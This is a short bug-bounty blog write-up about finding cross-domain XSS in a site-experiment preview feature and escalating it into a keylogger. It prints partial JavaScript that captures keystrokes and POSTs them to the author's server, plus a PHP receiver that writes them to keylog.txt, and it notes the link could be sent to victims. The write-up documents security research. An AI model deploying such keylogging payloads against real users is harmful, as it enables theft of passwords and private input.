Don’t just alert(1), because XSS is for fun…!!

Armaan Pathan
Sep 2, 2017 · 3 min read

It was the weekend and I was reading some good blogs and looking for good tweets. After reading a good blog I decided to give them a try. This time I chose because I had never hunted on this platform before, so why not give it a try.

I selected my target, which was and started looking for some cool bugs.

In the application I found a module called Create Experiment.


Here you enter your website’s URL and give the experiment a name, and you can then run experiments on your website.

So I simply filled in the form, entering my website and an experiment name. My website was loaded into the module, and I was now able to run experiments on my web application.

There was also an option to preview your experiments. This opens a new tab showing the experiments you have applied to your application. At first I had not made any experiments and just clicked Preview; it opened a new tab with my website in it.

Since it was loading my website inside this, I thought I would give it a try.

I wrote <script>prompt(document.domain);</script> into my site and put my site into the experiments again. Again I clicked on has opened in the new tab, but this time, instead of prompting my domain’s name in the pop-up, it prompted :) So yes, here I was able to run scripts on the from a different domain.


I wanted to exploit this XSS, so I decided to write a small piece of JavaScript that records keystrokes and sends them back to my server, where my website is hosted.

So I wrote this to record the keystrokes:

document.onkeypress = function(evt) {
  evt = evt || window.event;
  var key = String.fromCharCode(evt.charCode);
  if (key) {
    var http = new XMLHttpRequest();
    var param = encodeURI(key);
    http.open("POST", "", true); // the server URL is omitted in the original post
    // the remainder of the snippet is cut off in the original post
  }
};

And I also wrote this to receive those keystrokes on my server, create a keylog.txt file and save the keystrokes into it:

$fp = fopen($logfile, "a"); // $logfile is set earlier in the script (not shown in the post)
fwrite($fp, $key);          // $key holds the received keystroke
fclose($fp);

After writing this I updated my website. What it does: as soon as the page loads, the JavaScript starts recording keystrokes, and the server side creates a file keylog.txt and saves all the logs into it.

Now I put my site into the experiments again and again clicked on has opened, and it started logging keystrokes to my server and created a file keylog.txt.


And if I now send this link to any victim, it starts logging all the keystrokes the victim types. If I open the keylog.txt file, it looks like this.


But unfortunately the team said that this domain is not in scope :(

But yeah, I learned many things from this. :D

I hope you guys liked it. :)
Thanks for reading.
Have Great Day.
